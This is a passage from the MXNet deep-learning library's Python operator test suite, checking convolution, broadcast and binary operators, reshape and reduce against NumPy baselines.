# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x, in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
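# exe2 below reruns the same convolution with an independent grad_req per input; its
# outputs must match exe1 and its gradients must agree wherever the requests coincide.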
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1 and 5 and all the shape dims between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
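# reduce_op sums the broadcast output gradient back down to an input's original shape
# (i.e. the backward pass of broadcasting).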
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy compute '%' in double precision, so cast to float64 on the mxnet
# side as well to avoid numerical errors; this test was flaky with float32
# (seeds 1688524483, 1768433044).
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation, so round the numpy baseline through float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy compute '%' in double precision, so cast to float64 on the mxnet
# side as well to avoid numerical errors; this test was flaky with float32
# (seeds 1688524483, 1768433044).
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation.
c = mx.sym.broadcast_mod(a, b)
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1, kernel=kernel_shape, dilate=dil, no_bias=True, name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at the centre element
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(abs(out[center] - np.sum(kernel_gradient) - out_orig[center]) < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
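# Zeroing out one input dimension at a time checks that shape inference can still recover
# both the full input and output shapes from the reshape spec and the ones(dst_shape) operand.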
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
@with_seed()
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1 and 5 and all the shape dims between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
